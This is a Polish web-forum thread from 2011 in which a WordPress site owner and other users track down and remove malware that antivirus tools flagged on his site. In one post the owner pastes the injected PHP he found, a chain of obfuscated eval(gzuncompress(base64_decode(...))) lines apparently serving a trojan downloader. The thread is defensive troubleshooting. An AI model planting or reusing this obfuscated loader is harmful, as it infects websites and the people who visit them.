nightstalk3r 0 Report post Posted November 17, 2011 Witam, prowadze strone http://www.warcraft.net.pl/ Jakiś czas temu dostałem e-mail od google abym sprawdził pliki strony czy nie ma wirusa, sprawdziłem chyba wszystko co mi przyszło do głowy i nie znalazłem nic. Na wszelki wypadek wgrałem paczkę wordpressa na nowo na czysto. Dziś poinformował mnie ktoś o tym że kaspersky wykrywa wirus na stronie. Czy możecie mi pomóc? Żaden skaner nawet online nie wykrywa mi tam wirusa/trojana. Share this post Link to post Share on other sites
ktosGosc 0 Report post Posted November 17, 2011 Nie szukaj skanerem. Otwórz swoją stronę i w źródle strony zobacz co Ci się "przyczepiło" po znaczniku </html> Share this post Link to post Share on other sites
bartxx86 243 Report post Posted November 17, 2011 No coś tam masz... http://www.warcraft.net.pl/ JS/TrojanDownloader.Iframe.NKI koń trojański połączenie zostało zakończone - poddany kwarantannie Wykryto zagrożenie podczas uzyskiwania dostępu do stron internetowych przez aplikację: C:\Program Files\Mozilla Firefox\firefox.exe. Share this post Link to post Share on other sites
nightstalk3r 0 Report post Posted November 17, 2011 sprawdzcie teraz jeszcze raz prosze. W jednym pliku (ktore zreszta wczesniej tez skanowalem) mialem na koncu base64... itd. usunelem. Share this post Link to post Share on other sites
bartxx86 243 Report post Posted November 17, 2011 sprawdzcie teraz jeszcze raz prosze. W jednym pliku (ktore zreszta wczesniej tez skanowalem) mialem na koncu base64... itd. usunelem. U mnie teraz jest OK. Share this post Link to post Share on other sites
nightstalk3r 0 Report post Posted November 17, 2011 dzieki. czy mozliwe ze te gowno zostalo wrzucone przez rss czytnik ktory tam jest? innej mozliwosci raczej nie ma. Share this post Link to post Share on other sites
ktosGosc 0 Report post Posted November 17, 2011 dzieki. czy mozliwe ze te gowno zostalo wrzucone przez rss czytnik ktory tam jest? innej mozliwosci raczej nie ma. Zakładam, że przyczepiło się do pliku index lub .js więc to FTP lub "luki" w Wordpress Share this post Link to post Share on other sites
Jarek17 58 Report post Posted November 17, 2011 NOD wciąż wykrywa wirusa. Share this post Link to post Share on other sites
bartxx86 243 Report post Posted November 17, 2011 NOD wciąż wykrywa wirusa. Ja właśnie NOD-em sprawdzałem i siedzi cicho. Wcześniej wykrywał. Share this post Link to post Share on other sites
nightstalk3r 0 Report post Posted November 17, 2011 (edited) Ja właśnie NOD-em sprawdzałem i siedzi cicho. Wcześniej wykrywał. zeskanujcie jak mozecie raz jeszcze - po za tym ze w index.php stylu wczesniej gdzie usunelem, base 64 byl takze w index.php stylu domyslnego (co mnie w cholere dziwi). Tyle lat uzywam wp i nigdy jeszcze nic takiego mi sie nie przytrafilo. <?php eval(gzuncompress(base64_decode('eF5Tcffxd3L0CY5WjzcyNDG2NDc3MLGMV4+1dSwqSqzU0LQGAJCPCMM='))); eval(gzuncompress(base64_decode('eF5LK81LLsnMz1OINzczNTK1MDUy01DJ1KxWSbR1LCpKrNTQtC5KLSktylNISixONTOJT0lNzk9J 1VBJjFbJjNW0rgUAqDUUxQ=='))); eval(gzuncompress(base64_decode('eF6VlMmyo0YURPeO8D94192hhQokhBSOXhSjmAoVVYDQxoGYJzFKAr7ez257Ya/6/UDevHkyMnmF9ddsfT6itumGZBy/3sMxOez/iJOojZOvXxKFo1GazvHOBGLA+eUaLVZpzajUZhTU15L3GFPsjAFRPMEAFudWy/H371++ffv2+2+//pL8xAHTODKmOT6slbE1tOJ1kiCDyoCxphgvMRm9qgExefekX133El0ismOkqGKP42MZLpKJpPMS8YTx4 gSYVTsZZGe4IDdMec9Y+/pC3J1NwcNz5cbyxsZi7uQpYBHw88T+MPqTTulClndJI2Dx+I1owCJqXi0kAiGDr1PmpH+r/aTW/2IFVglZi6osknzT22+Yfz8mcjvS0l0L96TTiLuQ2MMek2IXbPSj2KrAO+ddAXvjWLWGHMfuyQrhhdkqA vz+CT+ojEYjqyB0rlslDwURXHJ71jw323da2R40mRpdS4G7wsjZXqfQjIck2hxOHc/bz77v+puTkrDPFsMoxgdVLn5dNCpjnotZMiFZKLX3LSu/xWPgnXXxxd2UgOtMuStvykbQOS04ZZINfXx9sg9l5G6GtgVvWJSG0uT8cr4x+pmL+C29MFouyy5VgBmk 9WCjtJIuBwvaskyLo/De1BNIvYk6O/3liRUSN4tenILmuXaHUeqGNR7ouqyfyIb+1agxALuPZs5o1dYP9iuzSthDwkcnZgxky0cQ63OW8ELrc0 LllmTOu7k3emSFNcicuCO11t2flxdnl3QngmRY8ipQ5yJo5i6sb69zN06yOgr1ja6SUyJPRVYU123gNY P kwhyM6zP7/hmmDAXA/GCKt2SMs9rXRPOUifjEuvCkhqLQ52ZxkHutKdrzZvO4+yIcdsdp/z5uwlMT7sqre/Bjns096xq4ppgfSHNomHt645A8tnLo1wPeKjUWwzM6Fy6801J9qwOWfUExd9U2eVAOZElU3Vc+2pdeJG osX+U022iZa0nW/LCIQLZPbjs0Rac9tmGfK+oW7k1LsaGMWZvsxuV9LSZ3/CDdQqpA6oCMr7F+OQDN42VrNztRLVGmOi9TZL02hmort/2iyAtvpWu7CtvHXihvbeyNn8nuv6vEBwCVFjuWGDCepDPG7JO788/0Obhcsd2DeRlXYhQvsSfZsjOV63USOcMk1bTUSCPFbCNq6xTUaK1OOuMJeqnc9RL5YMhciGs39OFn+PI mRQj/d0cSdpLw+uFztQLmWu4BWyAXinlxV53ppnZdr6p5H9bhoKtpsK/1p2o8c7fu3ZZtENnLjisrS95ya6iLlxQIWqoLA1ELfAUFbpnNu2GfmFa1E5Lu+YrCNimZ6OyxMGmHhWw RwSIv9dFR9ryN1h02Q8pmGjVsNrsdOMNpBat/t0oYvWgkq/vhjiWxSxuuow+lR+virP659Lri9uDEEdZeK0HFT0Ig/8jlTymmN/I='))); ?> Edited November 17, 2011 by nightstalk3r Share this post Link to post Share on other sites
ktosGosc 0 Report post Posted November 17, 2011 cholerka.. w kazdym index.php to jest A wiec stawiam na FTP. Zmień hasło do logowania FTP na serwer, nie wpisuj hasła na stałe do swojego klienta FTP tylko przy każdym połaczeniu je podawaj. Sprawdź wszystkie pliki o nazwie index oraz wszystkie pliki z rozszerzeniem .js Share this post Link to post Share on other sites
nightstalk3r 0 Report post Posted November 17, 2011 Proszę o ponowny skan nod i kasperskiego. Wgrany caly skrypt od nowa ze strony producenta, wywalone stare pluginy, zostawione tylko to co najwazniejsze i sprawdzone. Sprawdzony chyba kazdy mozliwy js i index, powinno byc czysto Share this post Link to post Share on other sites
Jarek17 58 Report post Posted November 17, 2011 Proszę o ponowny skan nod i kasperskiego. Wgrany caly skrypt od nowa ze strony producenta, wywalone stare pluginy, zostawione tylko to co najwazniejsze i sprawdzone. Sprawdzony chyba kazdy mozliwy js i index, powinno byc czysto NOD ok. Share this post Link to post Share on other sites
bartxx86 243 Report post Posted November 17, 2011 NOD ok. Potwierdzam Share this post Link to post Share on other sites
nightstalk3r 0 Report post Posted November 17, 2011 dzieki za pomoc Share this post Link to post Share on other sites